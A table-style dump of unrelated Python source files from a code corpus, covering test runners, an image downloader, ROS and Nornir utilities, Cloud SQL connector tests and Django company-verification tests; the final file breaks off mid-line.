index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
15,100 | df0756c94a20f5655f10a76de68f4cc7d3269d23 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
import sys
import logging
sys.path.append(".")
from tests import parser_tests, ruby_tests
from lib import test_runner
# Suppress log messages on stderr
logging.basicConfig(level = logging.CRITICAL)
# Define test instances: ex:
# log_load = Log_tests.TestLog('test_load')
# parser_newlines = parser_tests.TestParser('test_cleanNewlines')
# parser_headings = parser_tests.TestParser('test_findHeadings')
# parser_paragraphs = parser_tests.TestParser('test_parseParagraphs')
# parser_pagesplit = parser_tests.TestParser('test_pageSplit')
# parser_parse = parser_tests.TestParser('test_parse')
ruby_toruby = ruby_tests.TestRuby('test_toRuby')
ruby_parse = ruby_tests.TestRuby('test_parseRubytext')
ruby_bouten = ruby_tests.TestRuby('test_bouten')
ruby_bousen = ruby_tests.TestRuby('test_bousen')
test_suite = test_runner.ModuleTestRunner()
# Add tests to test suite:
# # test_suite.addTestList("MODULE NAME", [List, of, tests])
# test_suite.addTestList("Parser", [parser_newlines,
# parser_paragraphs,
# parser_headings,
# parser_pagesplit,
# parser_parse,])
test_suite.addTestList("Ruby", [ruby_toruby,
ruby_parse,
ruby_bouten,
ruby_bousen,])
if __name__ == "__main__":
# Run test suite
test_suite.run() |
15,101 | 9fab3b83436cbdaffdd48a9e22747d12035da70c |
import os
import argparse
import csv
import urllib
import urllib.request
import logging
import time
import traceback
import random #0 1 2 3 4 5 6 7 8 9 10 11 12
ColorList = ["银", "黑", "绿", "橙", "白", "灰", "红", "蓝", "紫", "黄", "金", "棕", "咖啡"]
DirectList = ['侧前45度车头向右水平', '侧前45度车头向左水平', '侧后45度车头向右水平', '侧后45度车头向左水平', '正侧车头向右水平', '正侧车头向左水平', '正前水平',
'正后水平']
def check_dire(pr_name):
'''
确定汽车朝向
:param pr_name:
:return:
'''
for i, p in enumerate(DirectList):
if pr_name == p:
direction = i
return direction
return -1
def check_color(p_name):
'''
在字符串中查找颜色
:param p_name:
:return:
'''
p_list = p_name.split(" ")
for s in p_list:
if s.startswith("外"):
for index, c in enumerate(ColorList):
if s.find(c) != -1:
return index
return -1
def str2int(s):
'''str to int'''
try:
return int(s)
except ValueError:
traceback.print_exc()
return s
def download(img_url, save_path):
'''download'''
strlog = img_url + "\t" + save_path
if os.path.isfile(save_path) and os.path.getsize(save_path) > 10240:
logging.debug(' [exist] ' + strlog)
return -1
try:
fi = urllib.request.urlopen(img_url)
img_file = fi.read()
# img_file = urllib.request.urlretrieve()
except:
traceback.print_exc()
logging.debug(' [urlopen error] ' + strlog)
return -2
else:
with open(save_path, "wb") as fo:
fo.write(img_file)
logging.info(' [write success] ' + strlog)
return 0
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--input', default='H:/外观、前排、后排.csv')
parser.add_argument('--out_dir', default='H:/chexi_download/')
return parser.parse_args()
def main(args):
logging.basicConfig(
filename=time.strftime("%Y%m%d_%H%M%S", time.localtime()) + "_download_pic.log",
level=logging.DEBUG,
format='%(asctime)s - %(levelname)s - %(message)s',
)
url_prefix = 'https://img1.bitautoimg.com/autoalbum/'
with open(args.input, 'r', encoding="gbk") as fi:
csv_reader = csv.reader(fi)
headers = next(csv_reader)
# headers = fi.readline().strip().split(',')
print(headers)
hid = {n:i for i, n in enumerate(headers)}
print(hid)
dict_count = {}
dict_count['5'] = 0
dict_count['6'] = 0
dict_count['7'] = 0
for row in csv_reader:
if len(row) != len(headers):
print("len(row) != len(headers)")
continue
url_path = url_prefix + row[hid['path']]
main_brand_id = str(int(row[hid['main_brand_id']]))
main_brand_name = row[hid['main_brand_name']]
brand_id = str(int(row[hid['brand_id']]))
brand_name = row[hid['brand_name']]
# series_id = str(int(row[hid['series_id']]))
series_id = row[hid['series_id']]
series_name = row[hid['series_name']]
# sell_year = str(int(row[hid['sell_year']]))
sell_year = row[hid['sell_year']]
spec_id = str(int(row[hid['spec_id']]))
spec_name = row[hid['spec_name']]
photo_id = str(int(row[hid['photo_id']]))
photo_name = row[hid['photo_name']]
property_id = row[hid['property_group_id']]
property_name = row[hid['property_name']]
sid_int = str2int(series_id)
if not isinstance(sid_int, int):
print("series_id is not a integer !!!!", row, series_id)
continue
if property_id == "6":
direction = check_dire(property_name)
if direction != -1:
#color = check_color(photo_name)
#out_dir_1 = os.path.join(args.out_dir, "{}.{}.{}.{}.d_{}".format(main_brand_id, brand_id, series_id, property_id, direction))
out_dir_1 = os.path.join(args.out_dir, "d_{}".format(direction))
if not os.path.isdir(out_dir_1):
os.makedirs(out_dir_1)
save_path_1 = os.path.join(out_dir_1, "{}.{}.{}.jpg".format(sell_year, spec_id, photo_id))
if os.path.isfile(save_path_1) and os.path.getsize(save_path_1) > 10 * 1024:
print(save_path_1, "【already exists】")
continue
ret = download(url_path, save_path_1)
if ret == 0:
print(url_path, save_path_1,
main_brand_id, main_brand_name,
brand_id, brand_name,
series_id, series_name,
sell_year,
spec_id, spec_name,
photo_name)
'''
if color != -1 and color in [12]:
out_dir_2 = os.path.join(args.out_dir, "c_{}".format(color))
if not os.path.isdir(out_dir_2):
os.makedirs(out_dir_2)
save_path_2 = os.path.join(out_dir_2, "{}.{}.{}.jpg".format(sell_year, spec_id, photo_id))
if os.path.isfile(save_path_2) and os.path.getsize(save_path_2) > 10 * 1024:
print(save_path_2, "【already exists】")
continue
ret = download(url_path, save_path_2)
if ret == 0:
print(url_path, save_path_2,
main_brand_id, main_brand_name,
brand_id, brand_name,
series_id, series_name,
sell_year,
spec_id, spec_name,
photo_name)
dict_count[property_id] += 1
print(dict_count['5'], dict_count['6'], dict_count['7'])
# break
'''
if __name__ == '__main__':
main(get_args())
|
15,102 | feccdb8846e921b0e841c0b3cca9e8927e773ef0 | from okcomputer import aiEngine
import os, time, sys
from random import randint
import msvcrt
os.system('mode con: cols=35 lines=15')
def delay(float):
time.sleep(float)
def clearScreen():
os.system('cls' if os.name == 'nt' else 'clear')
def robeFace():
while True:
clearScreen()
print '''
------\ /------
******* *******
* * * *
* * * * * *
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
if msvcrt.kbhit():
if ord(msvcrt.getch()) > 0:
msvcrt.getch()
aiEngine()
else:
delay(randint(0,4))
clearScreen()
print '''
------\ /------
******* *******
******* *******
** * ** ** * **
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
clearScreen()
print '''
------\ /------
******* *******
******* *******
******* *******
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
clearScreen()
print '''
------\ /------
******* *******
******* *******
******* *******
******* *******
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
clearScreen()
print '''
------\ /------
******* *******
******* *******
******* *******
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
clearScreen()
print '''
------\ /------
******* *******
******* *******
** * ** ** * **
* * * *
******* *******
^
^^^
^^^^^
_________
/_________\\
\_________/
'''
clearScreen()
if __name__ == '__main__':
robeFace() |
15,103 | d22a0204e4357d774b645b2b4175d4ce0242f31d | # import os, shutil
#
# for i in range(4, 13):
# if os.path.exists("./" + str(i)):
# print "%d folder exist!" % i
# else:
# os.mkdir("./" + str(i))
#
# if os.path.exists("./%d.py" % i):
# shutil.move("./%d.py" % i, "./%d/" % i);
# else:
# print "%d.py not exist" % i |
15,104 | 170a73ed985d2098ea61d79adee676b3ed43b5e8 | from detectron2.data.samplers import RepeatFactorTrainingSampler
from detectron2.data.common import DatasetFromList
from detectron2.data.build import get_detection_dataset_dicts
from numpy.core.fromnumeric import repeat
class RepeatfactorSampler(RepeatFactorTrainingSampler):
"""
Similar to TrainingSampler, but a sample may appear more times than others based on its "repeat factor".
This is suitable for training on class imbalanced datasets like LVIS.
"""
repeat_factors = None
threshold = None
def __init__(self, size:int, shuffle=True, seed=None):
super().__init__(RepeatFactorTrainingSampler.repeat_factors_from_category_frequency(self.repeat_factors,self.threshold),
shuffle=shuffle, seed=seed) |
15,105 | 787216a272c816c71c9e08a086ff040b31419f43 | from nornir import InitNornir
from nornir.core import Nornir
from flasnir.definitions import PROJECT_ROOT
HOSTS = PROJECT_ROOT / "config" / "inventory" / "hosts.yaml"
DEFAULTS = PROJECT_ROOT / "config" / "inventory" / "defaults.yaml"
def init_nornir() -> Nornir:
return InitNornir(
runner={
"plugin": "threaded",
"options": {
"num_workers": 100,
},
},
inventory={
"plugin": "SimpleInventory",
"options": {
"host_file": str(HOSTS),
"defaults_file": str(DEFAULTS)
},
},
) |
15,106 | af062d3c56362abfe4b8ededdde4dcf64fe33f32 | import argparse
import logging
from logger.mylogger import setup_logging
from pdf_scraper import Scraper
parser = argparse.ArgumentParser()
parser.add_argument("site", help="the site to scrape")
parser.add_argument("pdf_server")
parser.add_argument("output_folder", help="output base folder for generated pdfs")
if __name__ == "__main__":
setup_logging("logger/log_config.json")
lgr = logging.getLogger(__name__)
args = parser.parse_args()
lgr.error("Starting the log.")
for lp in range(10):
scr = Scraper(args.site, args.pdf_server, args.output_folder)
scr.scrape()
scr.create_pdfs()
|
15,107 | a43b290dcc49da9de05c338d1aefcb56d02c1922 | import numpy as np
from functions import compute_s_w, compute_s_b, compute_avg_face
from pca import calc_eig_pca_small
def calc_eig_fld(train_image=None, train_label=None, k=None, sw = [], sb = [], k_eigvecs = []):
if sw == [] or sb == [] or k_eigvecs == []:
m, N = train_image.shape
eigvals, eigvecs_pca = calc_eig_pca_small(train_image, m, N)
k_eigvecs = eigvecs_pca[:, :k]
face_avg = compute_avg_face(train_image)
sw = compute_s_w(train_image, train_label, face_avg)
sb = compute_s_b(train_image, train_label, face_avg)
rank_sw = np.linalg.matrix_rank(sw)
rank_sb = np.linalg.matrix_rank(sb)
# print("rank of sw: %a" %rank_sw)
# print("rank of sb: %a" %rank_sb)
wsww = np.dot(k_eigvecs.T, np.dot(sw, k_eigvecs))
wsbw = np.dot(k_eigvecs.T, np.dot(sb, k_eigvecs))
pca_mat = np.dot(np.linalg.pinv(wsww), wsbw)
eigvals_fld, eigvecs_fld = np.linalg.eig(pca_mat)
return eigvals_fld, eigvecs_fld, k_eigvecs
|
15,108 | 52e2d5f51a9c5082d00108fa5ab51601984e427d | #!/usr/bin/env python
import rospy
import sys, signal
import os
from math import pi
from std_msgs.msg import Float64
from ros_pololu_servo.msg import MotorState as MS
from ros_pololu_servo.msg import MotorStateList as MSL
from ros_pololu_servo.msg import MotorCommand as MC
PUBTHRESH = 0.01 # don't bother publishing if the last publish is within this percent
class CTLR_SUB:
def __init__(self):
self.steer_sub = rospy.Subscriber('steering/control_effort', Float64, self.steer_listen)
self.throttle_sub = rospy.Subscriber('throttle/control_effort', Float64,
self.throttle_listen)
self.motor_pub= rospy.Publisher('/pololu/command/', MC, queue_size = 3)
self.steer_last = 0.0
self.throttle_last = 0.0
def steer_listen(self, msg):
'''string joint_name # Name of the joint (specified in the yaml file), or motor_id for default calibration
float64 position # Position to move to in radians
float32 speed # Speed to move at (0.0 - 1.0)
float32 acceleration # Acceleration to move at (0.0 - 1.0)'''
if abs(self.steer_last-msg.data)/(abs(msg.data)+0.001) > PUBTHRESH:
output = MC()
output.joint_name = 'Turning'
output.position = msg.data
output.speed = 1.0
output.acceleration = 0.3
self.motor_pub.publish(output)
self.steer_last = msg.data
def throttle_listen(self, msg):
'''string joint_name # Name of the joint (specified in the yaml file), or motor_id for default calibration
float64 position # Position to move to in radians
float32 speed # Speed to move at (0.0 - 1.0)
float32 acceleration # Acceleration to move at (0.0 - 1.0)'''
if abs(self.throttle_last-msg.data)/(abs(msg.data)+0.001) > PUBTHRESH:
output = MC()
output.joint_name = 'Throttle'
output.position = msg.data
output.speed = 1.0
output.acceleration = 0.5
self.motor_pub.publish(output)
self.throttle_last = msg.data
def main():
rospy.init_node('turning_motor')
listen = CTLR_SUB()
rospy.spin()
if __name__ == '__main__':
main()
|
15,109 | 1c15449cddef3b4296c28fc6e3d72970383b187c | from tictactoe.players import RandomPlayer
from tictactoe.game import Board
def test_answer():
assert True == True
assert False == False
def test_move():
board = Board()
random = RandomPlayer()
random.marker = 'X'
board[0, 1] = random.marker
board[0, 2] = random.marker
board[1, 1] = random.marker
assert random.get_move(board) != (0, 1)
assert random.get_move(board) != (0, 2)
assert random.get_move(board) != (1, 1)
|
15,110 | 17ee96f7555cb7ec219117fcf041d468688b1618 | """"
Copyright 2021 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncio
from mock import patch
from mocks import MockInstance
import pytest # noqa F401 Needed to run the tests
from google.cloud.sql.connector import Connector, create_async_connector, IPTypes
from google.cloud.sql.connector.exceptions import ConnectorLoopError
def test_connect_enable_iam_auth_error() -> None:
"""Test that calling connect() with different enable_iam_auth
argument values throws error."""
connect_string = "my-project:my-region:my-instance"
# create mock instance with enable_iam_auth=False
instance = MockInstance(enable_iam_auth=False)
mock_instances = {}
mock_instances[connect_string] = instance
# init Connector
connector = Connector()
with patch.dict(connector._instances, mock_instances):
# try to connect using enable_iam_auth=True, should raise error
pytest.raises(
ValueError,
connector.connect,
connect_string,
"pg8000",
enable_iam_auth=True,
)
# remove mock_instance to avoid destructor warnings
connector._instances = {}
def test_connect_with_unsupported_driver(connector: Connector) -> None:
# try to connect using unsupported driver, should raise KeyError
with pytest.raises(KeyError) as exc_info:
connector.connect(
"my-project:my-region:my-instance",
"bad_driver",
)
# assert custom error message for unsupported driver is present
assert exc_info.value.args[0] == "Driver 'bad_driver' is not supported."
@pytest.mark.asyncio
async def test_connect_ConnectorLoopError() -> None:
"""Test that ConnectorLoopError is thrown when Connector.connect
is called with event loop running in current thread."""
current_loop = asyncio.get_running_loop()
connector = Connector(loop=current_loop)
# try to connect using current thread's loop, should raise error
pytest.raises(
ConnectorLoopError,
connector.connect,
"my-project:my-region:my-instance",
"pg8000",
)
def test_Connector_Init() -> None:
"""Test that Connector __init__ sets default properties properly."""
connector = Connector()
assert connector._ip_type == IPTypes.PUBLIC
assert connector._enable_iam_auth is False
assert connector._timeout == 30
assert connector._credentials is None
connector.close()
def test_Connector_Init_context_manager() -> None:
"""Test that Connector as context manager sets default properties properly."""
with Connector() as connector:
assert connector._ip_type == IPTypes.PUBLIC
assert connector._enable_iam_auth is False
assert connector._timeout == 30
assert connector._credentials is None
@pytest.mark.asyncio
async def test_Connector_Init_async_context_manager() -> None:
"""Test that Connector as async context manager sets default properties
properly."""
loop = asyncio.get_running_loop()
async with Connector(loop=loop) as connector:
assert connector._ip_type == IPTypes.PUBLIC
assert connector._enable_iam_auth is False
assert connector._timeout == 30
assert connector._credentials is None
assert connector._loop == loop
def test_Connector_connect(connector: Connector) -> None:
"""Test that Connector.connect can properly return a DB API connection."""
connect_string = "my-project:my-region:my-instance"
# patch db connection creation
with patch("google.cloud.sql.connector.pg8000.connect") as mock_connect:
mock_connect.return_value = True
connection = connector.connect(
connect_string, "pg8000", user="my-user", password="my-pass", db="my-db"
)
# verify connector made connection call
assert connection is True
@pytest.mark.asyncio
async def test_create_async_connector() -> None:
"""Test that create_async_connector properly initializes connector
object using current thread's event loop"""
connector = await create_async_connector()
assert connector._loop == asyncio.get_running_loop()
await connector.close_async()
def test_Connector_close_kills_thread() -> None:
"""Test that Connector.close kills background threads."""
# open and close Connector object
connector = Connector()
# verify background thread exists
assert connector._thread
connector.close()
# check that connector thread is no longer running
assert connector._thread.is_alive() is False
|
15,111 | 2ab8eeb7f1fc8f77782767f45e05c3613a19ea22 | # Generated by Django 2.2 on 2020-02-26 05:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('loginsys', '0006_products_quantity'),
]
operations = [
migrations.AlterField(
model_name='products',
name='quantity',
field=models.IntegerField(default=1, editable=False),
),
]
|
15,112 | a5567cd11b81ec24e8dcdc12c6a2793517fadda4 | from enum import Enum
class ChatMessageImportance(str, Enum):
Normal = "normal",
High = "high",
Urgent = "urgent",
UnknownFutureValue = "unknownFutureValue",
|
15,113 | 639236dedd8d821c1b32c5ffcf3d1328a85efc89 | import csv
impoort cell.py
class pack:
cellsInParallel = 0
cellsInSeries = 0
energyRequired = 0
voltageRequired = 0
powerRequired = 0
additionalCapacity = 30
cell = cell(0,0)
cellList[]
def __init__(self):
self.cellsInParallel = 0
self.cellsInSeries = 0
self.energyRequired = 0
self.voltageRequired = 0
self.powerRequired = 0
self.additionalCapacity = 30
self.cell = cell(0,0)
def setEnergyRequired(self, energy):
self.energyRequired = energy
def setVoltageRequired(self, voltage):
self.voltageRequired = voltage
def setPowerRequired(self,power):
self.powerRequired = power
def findPackConfig(self):
self.cellsInSeries = voltageReqired/self.cell.getVoltage()
self.cellsForCapacity = (self.energyRequired/((self.cell.getCapacity()-.7))*1.3
self.cellsForPower = self.powerRequired/self.cell.getMaxDischarge()
def loadCellInfo(self,path):
with open('cellPortfolio.txt') as csv_file:
csvReader = csv.reader(csv_file, delimiter=';')
lineCount = 0
for row in csvReader:
if lineCount == 0:
#First line
#print(f'Column names are {", ".join(row)}')
lineCount += 1
else:
#line 2 and after
#print(f'\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')
cell
lineCount += 1
def findCellsRequiredForPower(self):
def findCellsRequiredForVoltage(self):
def optimizePack(self):
#Optimize pack for weight
|
15,114 | 559aed159896c98fb4a2876875b3abc24e455d8b | import sys
from pathlib import Path
basedir = Path(__file__).absolute().resolve().parent
sys.path.insert(0, str(basedir))
from app import create_app
application = create_app()
|
15,115 | 4e9764507402a17d138703878c2279eecf2c002e | # Chapter-2: Fundamentals-2
# Star-Art
# Write 3 functions:
# Write function "drawLeftStars(num)" that accepts a number and prints that many 'stars'
# Write function "drawRightStars(num)" that accepts a number and prints 75 characters in total with that many 'stars' from the right side. The last 'num' characters of the 75 must be 'stars'
# Write function "drawCenterStars(num)" that prints 75 characters total. The stars should be centered in the 75.
# Assume the argument passed is a positive integer <= 75
def drawLeftStars(num):
print("{}").format('*' * num)
def drawRightStars(num):
star1 = "-" * (75 - num)
star2 = "*" * num
print("{}").format(star1 + star2)
def drawCenterStars(num):
star1 = "-" * ((75 - num)/2)
star2 = "*" * num
star3 = "-" * (75 - ((75 - num)/2 + num))
print("{}").format(star1+star2+star3)
drawLeftStars(35)
drawRightStars(40)
drawCenterStars(35)
|
15,116 | 2f59f994c351926c90d03bbc98b873bb6509b2ca | from django.urls import path
from . import views
urlpatterns = [
path('', views.update_profile_page, name='update_profile_page'),
path('register/', views.register_page, name='register_page'),
path('login/', views.login_page, name='login_page'),
path('logout/', views.logout_page, name='logout_page'),
path('delete/', views.delete_user_page, name='delete_user_page'),
]
|
15,117 | 7f582482264dbb39550b1bebbcf40e68b7b934b6 | from models.shared_rnn import RNN
from models.shared_cnn import CNN
from models.controller import Controller
from models.cnn_controller import CNNMicroController
|
15,118 | cc6fad9e146ad1997260eb9cb563804d66e75db7 | print("please enter a string")
a=input()
print("pls enter a string ")
b=input()
c=(b in a)
print(c)
|
15,119 | 9cbeccf0ec116003583e3e8749690215e3fa352c | import http
from unittest.mock import call, patch, Mock
import urllib
from directory_constants import choices, urls
from directory_api_client.client import api_client
import requests
import pytest
from django.urls import reverse
from company import forms, views, validators
from core.tests.helpers import create_response
@pytest.fixture
def all_company_profile_data():
return {
'name': 'Example Corp.',
'website': 'http://www.example.com',
'keywords': 'Nice, Great',
'employees': choices.EMPLOYEES[1][0],
'sectors': [choices.INDUSTRIES[3][0]],
'postal_full_name': 'Jeremy',
'address_line_1': '123 Fake Street',
'address_line_2': 'Fakeville',
'locality': 'London',
'postal_code': 'E14 6XK',
'po_box': 'abc',
'country': 'GB',
'export_destinations': ['CN', 'IN'],
'export_destinations_other': 'West Philadelphia',
'has_exported_before': True,
}
@pytest.fixture
def address_verification_address_data():
view = views.CompanyAddressVerificationView
data = {'code': '111111111111'}
step = view.ADDRESS
return {
'company_address_verification_view-current_step': step,
step + '-code': data['code'],
}
@pytest.fixture
def address_verification_end_to_end(
client, user, address_verification_address_data, retrieve_profile_data
):
user.company = retrieve_profile_data
client.force_login(user)
view = views.CompanyAddressVerificationView
data_step_pairs = [
[view.ADDRESS, address_verification_address_data],
]
def inner(case_study_id=''):
url = reverse('verify-company-address-confirm')
for key, data in data_step_pairs:
response = client.post(url, data)
return response
return inner
@pytest.fixture
def send_verification_letter_end_to_end(
all_company_profile_data, retrieve_profile_data, client, user
):
user.company = retrieve_profile_data
client.force_login(user)
all_data = all_company_profile_data
view = views.SendVerificationLetterView
address_data = {
'company_profile_edit_view-current_step': view.ADDRESS,
view.ADDRESS + '-postal_full_name': all_data['postal_full_name'],
view.ADDRESS + '-address_confirmed': True,
}
data_step_pairs = [
[view.ADDRESS, address_data],
]
def inner():
url = reverse('verify-company-address')
for key, data in data_step_pairs:
data['send_verification_letter_view-current_step'] = key
response = client.post(url, data)
return response
return inner
def test_send_verification_letter_address_context_data(
client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
response = client.get(reverse('verify-company-address'))
assert response.context['company_name'] == 'Great company'
assert response.context['company_number'] == 123456
assert response.context['company_address'] == (
'123 Fake Street, Fakeville, London, GB, E14 6XK'
)
@patch.object(
api_client.company, 'verify_with_code', return_value=create_response(200)
)
def test_company_address_validation_api_success(
mock_verify_with_code, address_verification_end_to_end, user,
settings, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
view = views.CompanyAddressVerificationView
response = address_verification_end_to_end()
assert response.status_code == http.client.OK
assert response.template_name == view.templates[view.SUCCESS]
mock_verify_with_code.assert_called_with(
code='1'*12,
sso_session_id=user.session_id,
)
@patch.object(api_client.company, 'verify_with_code')
def test_company_address_validation_api_failure(
mock_verify_with_code, address_verification_end_to_end,
retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
mock_verify_with_code.return_value = create_response(400)
response = address_verification_end_to_end()
expected = [validators.MESSAGE_INVALID_CODE]
assert response.status_code == http.client.OK
assert response.context_data['form'].errors['code'] == expected
def test_unsubscribe_logged_in_user(client, user):
client.force_login(user)
response = client.get(reverse('unsubscribe'))
view = views.EmailUnsubscribeView
assert response.status_code == http.client.OK
assert response.template_name == [view.template_name]
def test_unsubscribe_anon_user(client):
response = client.get(reverse('unsubscribe'))
assert response.status_code == http.client.FOUND
@patch.object(api_client.supplier, 'unsubscribe')
def test_unsubscribe_api_failure(
mock_unsubscribe, client, user, retrieve_profile_data
):
retrieve_profile_data.clear()
client.force_login(user)
mock_unsubscribe.return_value = create_response(400)
with pytest.raises(requests.exceptions.HTTPError):
client.post(reverse('unsubscribe'))
mock_unsubscribe.assert_called_once_with(sso_session_id='123')
@patch.object(
api_client.supplier, 'unsubscribe', return_value=create_response(200)
)
def test_unsubscribe_api_success(
mock_unsubscribe, client, user, retrieve_profile_data
):
retrieve_profile_data.clear()
client.force_login(user)
response = client.post(reverse('unsubscribe'))
mock_unsubscribe.assert_called_once_with(sso_session_id='123')
view = views.EmailUnsubscribeView
assert response.status_code == http.client.OK
assert response.template_name == view.success_template
def test_robots(client):
response = client.get(reverse('robots'))
assert response.status_code == 200
def test_companies_house_oauth2_has_company_redirects(
settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
url = reverse('verify-companies-house')
response = client.get(url)
assert response.status_code == 302
assert urllib.parse.unquote_plus(response.url) == (
'https://account.companieshouse.gov.uk/oauth2/authorise'
'?client_id=debug'
'&redirect_uri=http://testserver/find-a-buyer/'
'companies-house-oauth2-callback/'
'&response_type=code&scope=https://api.companieshouse.gov.uk/'
'company/123456'
)
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_missing_code(
mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
url = reverse('verify-companies-house-callback') # missing code
response = client.get(url)
assert response.status_code == 200
assert mock_verify_oauth2_code.call_count == 0
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
api_client.company, 'verify_with_companies_house',
return_value=create_response(200)
)
def test_companies_house_callback_has_company_calls_companies_house(
mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
mock_verify_oauth2_code.return_value = create_response(
status_code=200, json_body={'access_token': 'abc'}
)
url = reverse('verify-companies-house-callback')
response = client.get(url, {'code': '111111111111'})
assert response.status_code == 302
assert response.url == str(
views.CompaniesHouseOauth2CallbackView.success_url
)
assert mock_verify_oauth2_code.call_count == 1
assert mock_verify_oauth2_code.call_args == call(
code='111111111111',
redirect_uri=(
'http://testserver/find-a-buyer/companies-house-oauth2-callback/'
)
)
assert mock_verify_with_companies_house.call_count == 1
assert mock_verify_with_companies_house.call_args == call(
sso_session_id=user.session_id,
access_token='abc',
)
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
api_client.company, 'verify_with_companies_house',
return_value=create_response(200)
)
def test_companies_house_callback_has_company_calls_url_prefix(
mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
mock_verify_oauth2_code.return_value = create_response(
status_code=200, json_body={'access_token': 'abc'}
)
url = reverse('verify-companies-house-callback')
response = client.get(url, {'code': '111111111111'})
assert response.status_code == 302
assert response.url == str(
views.CompaniesHouseOauth2CallbackView.success_url
)
assert mock_verify_oauth2_code.call_count == 1
assert mock_verify_oauth2_code.call_args == call(
code='111111111111',
redirect_uri=(
'http://testserver/find-a-buyer/companies-house-oauth2-callback/'
)
)
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
@patch.object(
api_client.company, 'verify_with_companies_house',
return_value=create_response(500)
)
def test_companies_house_callback_error(
mock_verify_with_companies_house, mock_verify_oauth2_code, settings,
client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
mock_verify_oauth2_code.return_value = create_response(
status_code=200, json_body={'access_token': 'abc'}
)
url = reverse('verify-companies-house-callback')
response = client.get(url, {'code': '111111111111'})
assert response.status_code == 200
assert response.template_name == (
views.CompaniesHouseOauth2CallbackView.error_template
)
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_invalid_code(
mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
mock_verify_oauth2_code.return_value = create_response(400)
url = reverse('verify-companies-house-callback')
response = client.get(url, {'code': '111111111111'})
assert response.status_code == 200
assert b'Invalid code.' in response.content
@patch.object(forms.CompaniesHouseClient, 'verify_oauth2_code')
def test_companies_house_callback_unauthorized(
mock_verify_oauth2_code, settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
mock_verify_oauth2_code.return_value = create_response(401)
url = reverse('verify-companies-house-callback')
response = client.get(url, {'code': '111111111111'})
assert response.status_code == 200
assert b'Invalid code.' in response.content
def test_verify_company_has_company_user(
settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
url = reverse('verify-company-hub')
response = client.get(url)
assert response.status_code == 200
assert response.template_name == [views.CompanyVerifyView.template_name]
def test_verify_company_address_feature_flag_on(
settings, client, user, retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
user.company = retrieve_profile_data
client.force_login(user)
response = client.get(reverse('verify-company-address'))
assert response.status_code == 200
@patch.object(api_client.company, 'profile_update')
def test_verify_company_address_end_to_end(
mock_profile_update, settings, send_verification_letter_end_to_end,
retrieve_profile_data
):
retrieve_profile_data['is_verified'] = False
mock_profile_update.return_value = create_response(200)
view = views.SendVerificationLetterView
response = send_verification_letter_end_to_end()
assert response.status_code == 200
assert response.template_name == view.templates[view.SENT]
assert response.context_data['profile_url'] == 'http://profile.trade.great:8006/profile/business-profile/'
assert mock_profile_update.call_count == 1
assert mock_profile_update.call_args == call(
data={'postal_full_name': 'Jeremy'},
sso_session_id='123'
)
def test_company_address_verification_backwards_compatible_feature_flag_on(
settings, client
):
url = reverse('verify-company-address-historic-url')
response = client.get(url)
assert response.status_code == 302
assert response.get('Location') == reverse('verify-company-address')
def test_case_study_create_backwards_compatible_url(client):
url = reverse('company-case-study-create-backwards-compatible')
response = client.get(url)
assert response.status_code == 302
assert response.url == urls.domestic.SINGLE_SIGN_ON_PROFILE
def test_buyer_csv_dump_no_token(client):
url = reverse('buyers-csv-dump')
response = client.get(url)
assert response.status_code == 403
assert response.content == b'Token not provided'
@patch('company.views.api_client')
def test_buyer_csv_dump(mocked_api_client, client):
mocked_api_client.buyer.get_csv_dump.return_value = Mock(
content='abc',
headers={
'Content-Type': 'foo',
'Content-Disposition': 'bar'
}
)
url = reverse('buyers-csv-dump')
response = client.get(url+'?token=debug')
assert mocked_api_client.buyer.get_csv_dump.called is True
assert mocked_api_client.buyer.get_csv_dump.called_once_with(token='debug')
assert response.content == b'abc'
assert response.headers['Content-Type'] == ('foo')
assert response.headers['Content-Disposition'] == ('bar')
@patch('company.views.api_client')
def test_supplier_csv_dump(mocked_api_client, client):
mocked_api_client.supplier.get_csv_dump.return_value = Mock(
